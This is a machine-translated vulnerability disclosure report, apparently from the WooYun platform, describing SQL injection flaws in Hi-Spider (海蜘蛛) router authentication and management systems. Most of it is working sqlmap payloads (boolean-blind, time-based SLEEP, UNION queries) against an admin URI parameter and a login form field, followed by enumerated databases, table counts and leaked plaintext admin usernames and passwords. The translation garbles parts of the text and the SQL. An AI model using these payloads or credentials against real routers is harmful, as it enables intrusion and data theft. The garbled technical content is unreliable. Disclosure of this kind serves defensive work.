wifi安全之海蜘蛛多处SQL注入打包(影响大量路由器)

漏洞标题 wifi安全之海蜘蛛多处SQL注入打包(影响大量路由器) 相关厂商 武汉海蜘蛛网络科技有限公司 漏洞作者 千机 提交时间 2016-05-11 13:10 公开时间 2016-06-27 1…

漏洞标题 Wifi安全海蜘蛛多个SQL注入包装(影响大量路由器) 相关制造商 武汉海蜘蛛网络科技有限公司 漏洞作者 千机 提交时间 2016-05-11 13: 10 公共时间 2016-06-27 18: 20 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 Mysql的 漏洞详细信息 https://**。**。**。**/demo.htm 这似乎是一个演示演示站点,它为身份验证计费系统演示地址提供了一个后台登录密码。 所以进去看看,我发现了sql注入 注入存在于查询用户处 http://**。**。**。**: 80/admin.php/User/index/texttype/username/text/11 *(GET) --- 参数:#1 *(URI) 输入:基于布尔值的盲 标题: AND基于布尔的盲 - WHERE或H * ING子句 有效载荷:http://**。**。**。**: 80/admin.php /用户/索引/文本类型/用户名/文本/11%'和1088=1088 AND'%'=' 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SELECT) 有效载荷:http://**。**。**。**: 80/admin.php /用户/索引/文本类型/用户名/文本/11%'和(SELECT * FROM(SELECT(SLEEP(5)))RkuO) AND'%'=' 键入: UNION查询 标题:通用UNION查询(NULL) - 15列 有效载荷:http://**。**。**。**: 80/admin.php /用户/索引/文本类型/用户名/文本/11%'UNION ALL SELECT NULL,CONCAT(0x71706a7774a7a486c52635342455759514b6e595149494a514d63586c4f47624c494e5344574b51,0x716a6b6271),NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL - --- 后端DBMS: MySQL 5.0.12 横幅:'5.1.45' 受影响的5个数据库,root权限,shell没有成功。 可用数据库[5]: [*] bak [*] information_schema [*] mysql [*]半径 [*]测试 此查询还有一个注入。

这个背景应该注入很多。找到两个并找到它。其他自我检查 海蜘蛛路由信息系统 http://**。**。**。**/index.php /登录 登录时存在Sql注入 http://**。**。**。**: 80/index.php /登录/checkLogin(POST) 名称=管理和放大器;密码=管理员和放大器;验证=3832 Sqlmap从存储的会话:恢复以下注入点 --- 参数:名称(POST) 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SELECT) 有效载荷:名称=admin'AND(SELECT * FROM(SELECT(SLEEP(5)))kdKR)AND'AYDD'='AYlD& password=admin& verify=3832 --- Web应用程序技术: PHP 5.2.17 后端DBMS: MySQL 5.0.12 当前数据库:'hsrouter' Sqlmap从存储的会话:恢复以下注入点 --- 参数:名称(POST) 输入:和/或基于时间的盲 标题: MySQL>=5.0.12 AND基于时间的盲(SELECT) 有效载荷:名称=admin'AND(SELECT * FROM(SELECT(SLEEP(5)))kdKR)AND'AYDD'='AYlD& password=admin& verify=3832 --- 影响19个数据库 [*] bak [*] bak2 [*] bak_operate [*] forumx2 [*] hs_spider [*] hsrouter [*] hsrouterinfo [*] information_schema [*]彩票 [*] my_wiki [*] mysql [*]运作 [*]半径 [*] radiuscloud [*]注册 [*]测试 [*] tipask [*] tomreport [*] ucenter Radius是刚才身份验证计费系统的数据库。 维基应该是内部维基的数据库 UCenter应该是bbs数据库。 当前数据库是hsrouter 数据库: hsrouter + ---------- + --------- + |表|参赛作品| + ---------- + --------- + |注册| 117962 | |试试| 7732 | | try_max | 624 | | host_max | 576 | |工业| 33 | | `user` | 2 | + ---------- + --------- + 11w这不知道它是否是路由器的数量 密码存在于用户表中,并读取数据。 帐户密码是 Thx 123456 Hispider hzz123456

9941在线路由器。 泄露号码ip和地址

漏洞证明:

修理计划: 改变和改变 版权声明:请注明出处。成千上万的机器@乌云